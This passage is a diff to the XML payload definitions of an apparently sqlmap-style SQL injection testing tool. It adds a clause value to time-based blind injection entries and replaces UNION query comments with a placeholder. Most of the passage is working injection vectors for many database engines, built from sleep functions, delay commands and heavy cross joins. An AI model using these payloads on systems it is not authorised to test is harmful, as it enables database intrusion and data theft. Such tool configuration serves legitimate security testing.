         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -534,7 +534,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -554,7 +554,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -617,7 +617,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
         <request>
@@ -638,7 +638,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
         <request>
@@ -659,7 +659,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
         <request>
@@ -681,7 +681,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
         <request>
@@ -703,7 +703,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
         <request>
@@ -722,7 +722,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
         <request>
@@ -741,7 +741,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
         <request>
@@ -761,7 +761,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
         <request>
@@ -781,7 +781,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
         <request>
@@ -800,7 +800,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
         <request>
@@ -819,7 +819,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
         <request>
@@ -839,7 +839,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
         <request>
@@ -859,7 +859,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
         <request>
@@ -878,7 +878,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
         <request>
@@ -897,7 +897,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
         <request>
@@ -917,7 +917,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
         <request>
@@ -937,7 +937,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -957,7 +957,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -977,7 +977,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -998,7 +998,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -1019,7 +1019,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
         <request>
@@ -1039,7 +1039,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
         <request>
@@ -1059,7 +1059,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
         <request>
@@ -1080,7 +1080,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
         <request>
@@ -1101,7 +1101,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
@@ -1120,7 +1120,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
@@ -1139,7 +1139,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
@@ -1159,7 +1159,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
@@ -1179,7 +1179,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1199,7 +1199,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1219,7 +1219,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1240,7 +1240,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1261,7 +1261,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1281,7 +1281,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1301,7 +1301,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1322,7 +1322,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
         <request>
@@ -1390,7 +1390,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
         <request>
@@ -1410,7 +1410,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -1430,7 +1430,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
         <request>
@@ -1450,7 +1450,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -1469,7 +1469,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -1488,7 +1488,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -1507,7 +1507,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -1527,7 +1527,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -1546,7 +1546,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
         <request>
@@ -1567,7 +1567,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
         <request>
@@ -1589,7 +1589,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
         <request>
@@ -1608,7 +1608,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
         <request>
@@ -1627,7 +1627,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
         <request>
@@ -1646,7 +1646,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
         <request>
@@ -1666,7 +1666,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
         <request>
@@ -1686,7 +1686,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,3</clause>
+        <clause>1,3,9</clause>
         <where>3</where>
         <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
         <request>
@@ -1705,7 +1705,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>3</where>
         <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
         <request>
@@ -1725,7 +1725,7 @@
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
         <request>
@@ -1745,7 +1745,7 @@
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
         <request>

xml/payloads/06_union_query.xml

@@ -12,7 +12,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>[COLSTART]-[COLSTOP]</columns>
         </request>
@@ -31,7 +31,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>[COLSTART]-[COLSTOP]</columns>
         </request>
@@ -50,7 +50,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>[COLSTART]-[COLSTOP]</columns>
         </request>
@@ -69,7 +69,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>1-10</columns>
         </request>
@@ -88,7 +88,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>1-10</columns>
         </request>
@@ -107,7 +107,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>1-10</columns>
         </request>
@@ -126,7 +126,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>11-20</columns>
         </request>
@@ -145,7 +145,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>11-20</columns>
         </request>
@@ -164,7 +164,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>11-20</columns>
         </request>
@@ -183,7 +183,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>21-30</columns>
         </request>
@@ -202,7 +202,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>21-30</columns>
         </request>
@@ -221,7 +221,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>21-30</columns>
         </request>
@@ -240,7 +240,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>31-40</columns>
         </request>
@@ -259,7 +259,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>31-40</columns>
         </request>
@@ -278,7 +278,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>31-40</columns>
         </request>
@@ -297,7 +297,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[CHAR]</char>
             <columns>41-50</columns>
         </request>
@@ -315,7 +315,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>NULL</char>
             <columns>41-50</columns>
         </request>
@@ -334,7 +334,7 @@
         <vector>[UNION]</vector>
         <request>
             <payload/>
-            <comment>-- -</comment>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
             <char>[RANDNUM]</char>
             <columns>41-50</columns>
         </request>